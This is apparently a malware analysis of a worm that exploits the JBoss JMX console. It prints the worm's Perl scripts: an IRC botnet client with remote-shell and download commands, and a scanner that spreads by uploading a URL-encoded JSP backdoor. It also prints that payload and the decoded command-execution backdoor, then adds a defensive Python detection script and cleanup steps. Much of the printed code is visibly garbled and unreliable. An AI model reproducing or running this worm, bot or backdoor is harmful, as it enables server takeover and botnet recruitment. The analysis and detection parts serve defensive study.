How a JBoss vulnerability leads to attacks on Linux servers: the mechanism and the fix
Source: -details/

Key points: clean up the malware in the normal way. Delete idssvc.war, zecmd.war and iesvc.war from JBoss's server/default/deploy/management/ directory (these are the malware's backdoors), and remember to clear everything under /tmp.

You'll discover that inside the encoded data there's the JSP which is used for activating a web-based system command executor based on the Java Runtime.getRuntime().exec() method.

magicstick

This is the worm. Once deployed, the attacker performs these system commands:

# perl linda.pl

Part of the JBoss exploit code used a Java backdoor, URL-encoded for transport (3c%25 40%20%70%61%67%), I assume to avoid easy detection by anti-virus, firewalls, IDS/IPS, etc.

I explored the contents of the malicious payload left and it contained Perl scripts to automatically connect the compromised host to an IRC server and be part of a botnet, install and run a remote access tool using dyndns (Flu.pl), and two Windows batch scripts, one for exploring JBoss services (wstools.bat) and a script to discover all UDP-based members running on a certain mcast address, the JGroups "Cluster Discovery Script for Win32" (probe.bat). Also included is a Perl script (Linda.pl) that helps in invoking the JMX console. Perl and BAT script details below:

- Flu.pl - (Connects to IRC to join a BOTNET and uses dyndns)

#!/usr/bin/perl# use IO:Socket:INET;#my $processo =“ /usr/local/apache/bin/h-tDtpSdSL”my $pid=fork;exit if $pid;$0=” $processo ”. ” “x16;# Server Config#my sopsbnet.doesntexi=( “ localhost ”, ” magicstick- ”, ” );my $port=2020*4;my $chan= ” #jb ”;my

$boxing = uname -a;$user = whoami;$boxing = s/r/g;$boxing = s/n/g;$boxing = s/ /g;$boxing = s/s/g;$user = s/r/g;$user = s/n/g;$user = s/ /g;$user = s/s/g;# # Config # while(1) my $nick= ” (rand(99999).“;retry:close($sk);my $server =“”;while(length($server)<10) $server = $sopsint(rand(9);sleep(3); my $sk = IO:Socket:INET->new(PeerAddr=>$server,PeerPort=>$port,Proto=> ”tcp ”) or goto retry; $sk->autoflush(1);print $sk“POST /index.php HTTPr/1n.H1ost:$server:$portrnUser-Agent: Mozilla/5.0rnContent-Length: n”;print $sk“NICK $nicnk”;print $sk“USER “ .$user. : ”“ .8$u*ser.n”;while($line = <$sk>)$line = s/rn$/;if ($line= QPING :(.*)/)print $sk “PONG :n$”1 ;if($line = /welcomesto/i) sleep(2);print $sk “JOIN $chna”n ;sleep(1);print $sk “PRIVMSG $chan :UserName=$boxing”;# Commands# # !dieif ($line= /PRIVMSG (.*) :.die/)$owner=$line;if($owner=/iseee/gi) sendsk($sk,“QUIT”);die;# end of !die # !rshs”(.*) ” /) $owner=$line;$de=$2; if($owner=/iseee/gi) shell=$de;foreach $line (shell) sendsk($sk,“ PRIVMSG iseee :$line”);sleep(1);# end of !rsh# !get“url” “ times ”s”(.*) s”(.*) ”/)$owner=$line;$url=$2; $mult=$3;if($owner=/iseee/gi) $url=/http:/(.*)/(.*)/g;for($xz=0;$xz<=$mult;$xz+) system( “ curl“ .$url.” >/dev/null&”);curl“$url ” >/dev/null&system( “ wget“ .$url.” >/dev/null&” );wget“ $url ” >/dev/null&system( “ wget $url>/dev/null&” );sendsk($sk, “ PRIVMSG iseee :Got $host/$pa$thmult n” );# End of !get# !post “ url ”“ data ”s” (.*) s” (.*) ” /)$owner=$line;$url=$2;$ddata=$3;if($owner=/iseee/gi) $url=/http:/(.*)/(.*)/g;$host=$1;$path=$2;my $sck=new IO:Socket:INET(PeerAddr=>$host,PeerPort=>80);print $sck “ POST /$path HTTP/1.0 n”.a”“n”.a”“n”.“ Content- Length: “.length($ddata).”n”.$ddata;sleep(1);close($sck);sendsk($sk, “PRIVMSG (.*)sted $host/$path - n” );# End of !post# End of Commands # #sub sendsk() if ($#_ = T ) my $sk = $_0; print $sk “$_1n ” ; else print $skn“”$_; 0

WStools.bat

echo offrem $Id: wstools.bat 499 2006-06-21 22:33:41Z $if not “ %ECHO”% = “ec”ho %ECHO%if “ %OS%” = “ Windows_NTs”etlocalset DIRNAME=.if “ %OS%” = “ Windows_NT ” set DIRNAME=%dp0% set PROGNAME=run.batif “ %OS%” = “ Windows_NT ” set PROGNAME=%nx0% rem Read all command line argumentsREMREM The %ARGS% env variable commented out in favor of using %* to includeREM all args in java command line. See bug #840239. jplREMREM set ARGS=REM :loopREM if %1 = goto endloopREMset ARGS=%ARGS% %1REMshiftREMgoto loopREM :endloop set JAVA=%JAVA_HOME%binjavaset JBOSS_HOME=%DIRNAME%. rem Setup the java endorsed dirs setJBOSS_ENDORSED_DIRS=%JBOSS_HOME%libendorsed rem Setup the wstools classpathsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/jboss-xml-binding.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/activation.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/javassist.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/jbossall-client.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/jbossretro-rt.jar set WSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/jboss-backport-concurrent.jar setWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/jbossws-client.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/jbossws14-client.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/log4j.jarsetWSTOOLS_CLASSPATH=%WSTOOLS_CLASSPATH%;%JBOSS_HOME%/client/mail.jar rem Display our environmentecho echo WSTools Environmentecho .echo JBOSS_HOME: %JBOSS_HOME% echo .echo JAVA: %JAVA% echo .echo JAVA_OPTS: %JAVA_OPTS% echo .rem echo CLASSPATH: %WSTOOLS_CLASSPATH% rem echo .echoecho .rem Execute the JVM“%JAVA%” %JAVA_OPTS%”%JBOSS_ENDORSED_DIR”S%-Dlog4j.configuration=wstools-log4j.xml -classpath“ %WSTOOLS_CLASSPAT”%*

Probe.bat

echo offrem rem JGroups Cluster Discovery Script for Win32remREM Discovers all UDP-based members running on a certain mcast address (use -help for help)REM Probe -help -addr <addr> -port <port>-ttl <ttl> -timeout <timeout>setCLASSPATH=.libcommons-logging.jar;.serveralllibjgroups.jarset CP=%CLASSPATH%*

Linda.pl

#!/usr/bin/perl# Short and unefficiant poc # If you see this, well, good for you.# It prolly means this test went out of control, Sorry! :use IO:Socket;my $processo =“ /usr/local/jboss/bin/tomcat”my $pid=fork;exit if $pid;$0=”$processo ” . ” “ x16;make Inx;system( “make lnx ”);system( “ perl flu.pl&” );$zecmd = “ %6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c% 2f%48%54%4d%4c%3e&argType=boolean&arg4=Trn”while(1) $partx=int(rand(255);$party=int(rand(255);$sudoku= ” ./pnscan ”HEAD / HTTP/1.0-t 6650 80 >”; system($sudoku);or dieopen FILE, “ = <FILE> close(FILE);foreach $possible (target) $possible=s/)/;$possible=s/(/;$possible=/(.*).(.*).(.*).(.*)ss(.*):s(.*)80s/g;$it= ” $1.$2.$3.$4 ” ;$it=s/s/g;$it=s/ /g;$it=s/t/g;my $crap = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto np; print $crap $zecmd;$page = “”;$page .= $_ while <$crap>sleep(2);if($page=/200/|$page=/500/) print “+n“ ; push(target,$it); np:close($crap);foreach $it (target) my $sck = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;n”;$page =a ”?$page .=$_ while <$sck>print $sckGET /zecmd/zecmd.jsp HTTPr/1n.C0onnection:if($page=/comments/g) my $scka = new IO:Socket:INET(PeerAddr=>$it,PeerPort=>80, TimeOut=>120) or goto nta; print $scka “ GET /zecmd/zecmd.jsp?comment=wget+n”sleep(4);close($scka);my $sckb = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta; print $sckb“ GETn”;sleep(3);close($sckb);my $sckd = new IO:Socket:INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;print $sckd “GET /zecmd/zecmd.jsp?comment=perl+linda.pl sleep(2);close($sck);nta:close($sck);

Exploit Payload

Exploit payload with JAVA/JSP backdoor, URL-encoded for transport:

“%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=Truen”

Back Door Analysis:

<% page import= ” ” %><% %><HTML><BODY><FORM METHOD= ” GET” NAME=” comments ”ACTION=” ><INPUT TYPE= ”text ” NAME=” comment ” ><INPUT TYPE= ” submit A”LUVE=” Send” ></FORM><pre><% if (request.getParameter(“ comment ” ) !=n ull) out.println( “ Command: ” + request.getParameter(“comm+ “ <BR> ”)c; ePsrso p=Runtime.getRuntime().exec(request.getParameter(“ comment ” );OutputStream os=p .getOutputStream(); InputStream in=p .getInputStream(); DataInputStream dis=n ewDataInputStream(in); String disr=d is.readLine(); while( disr !=n ull ) out.println(disr); disr=dis.readLine(); %></pre></BODY> </HTML>

Worm Detection

The worm can be de
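The write-up gives a defender three concrete indicators: the backdoor WARs (idssvc.war, zecmd.war, iesvc.war) dropped under server/default/deploy/management/, the /zecmd/zecmd.jsp?comment= command channel the worm calls, and the URL-encoded JSP payload (beginning %3c%25, i.e. "<%") pushed through the JMX console with argType=boolean&arg4=True. The following Python script is an added example, not code from the original analysis: it checks a deploy tree for the named WARs and flags those two request shapes in web-server access logs. The Apache combined log format, the client IPs, the temp deploy tree and the /jmx-console/HtmlAdaptor servlet path in the sample lines are my assumptions for the demo (the page only says the scripts "invoke the JMX console").

```python
"""Host and access-log checks for the JBoss worm described above.

Added example (not the original write-up's code). Indicator names come from
the page; log lines and the deploy tree are constructed samples so the
script runs offline.
"""
import os
import re
import tempfile
from urllib.parse import unquote_plus

# Backdoor WAR names listed in the write-up (assumption: exact, case-sensitive)
BACKDOOR_WARS = ("idssvc.war", "zecmd.war", "iesvc.war")

# Request shapes: the dropped JSP's command channel, and a JMX-console request
# carrying a URL-encoded "<%" (start of a JSP scriptlet) in its query string.
ZECMD_RE = re.compile(r"/zecmd/zecmd\.jsp\?comment=")
JMX_RE = re.compile(r"/jmx-console/HtmlAdaptor")   # assumed servlet path
JSP_OPEN_RE = re.compile(r"%3c%25", re.IGNORECASE)

# Constructed sample access-log lines (Apache combined format, fake IPs).
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Oct/2011:10:00:01 +0000] "POST /jmx-console/HtmlAdaptor'
    '?action=invokeOp&argType=boolean&arg4=True'
    '&arg0=%3c%25+out.println%28%22x%22%29+%25%3e HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [20/Oct/2011:10:00:09 +0000] '
    '"GET /zecmd/zecmd.jsp?comment=uname+-a HTTP/1.0" 200 87 "-" "-"',
    '192.0.2.7 - - [20/Oct/2011:10:01:00 +0000] '
    '"GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.0.2.7 - - [20/Oct/2011:10:01:01 +0000] "HEAD / HTTP/1.0" 200 0 "-" "-"',
]


def scan_deploy_dir(deploy_dir):
    """Return sorted paths of known backdoor WARs found under deploy_dir."""
    found = []
    for root, _dirs, files in os.walk(deploy_dir):
        for name in files:
            if name in BACKDOOR_WARS:
                found.append(os.path.join(root, name))
    return sorted(found)


def classify_request(request_line):
    """Map one HTTP request line ('GET /path HTTP/1.0') to an indicator label."""
    if ZECMD_RE.search(request_line):
        return "zecmd-command-channel"
    if JMX_RE.search(request_line) and JSP_OPEN_RE.search(request_line):
        return "jmx-console-jsp-deploy"
    return None


def flag_access_log(lines):
    """Return (client_ip, label, decoded_query) for every line that matches."""
    hits = []
    for line in lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue                      # not a combined-format line
        client_ip = line.split(" ", 1)[0]
        request = parts[1]                # text between the first pair of quotes
        label = classify_request(request)
        if label is None:
            continue
        path = request.split(" ")[1] if " " in request else request
        query = path.partition("?")[2]
        # Decode so the analyst sees the command or scriptlet as it was executed
        hits.append((client_ip, label, unquote_plus(query)[:80]))
    return hits


def build_sample_deploy_tree():
    """Create a throwaway deploy tree with two planted WARs and one benign WAR."""
    base = tempfile.mkdtemp(prefix="jboss-deploy-")
    mgmt = os.path.join(base, "management")
    os.makedirs(mgmt)
    for name in ("idssvc.war", "zecmd.war"):          # constructed: planted backdoors
        open(os.path.join(mgmt, name), "wb").close()
    open(os.path.join(base, "jmx-console.war"), "wb").close()   # legitimate app
    return base


if __name__ == "__main__":
    for ip, label, query in flag_access_log(SAMPLE_LOG):
        print(f"{ip}  {label}  {query}")
    tree = build_sample_deploy_tree()
    for war in scan_deploy_dir(tree):
        print("backdoor WAR present:", war)
```

Run against a real host, point scan_deploy_dir at the JBoss server/default/deploy directory and feed flag_access_log the access log of the front-end web server; a hit on either indicator is a reason to treat the host as compromised and go through the cleanup the write-up describes (remove the WARs, clear /tmp, look for the IRC process).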
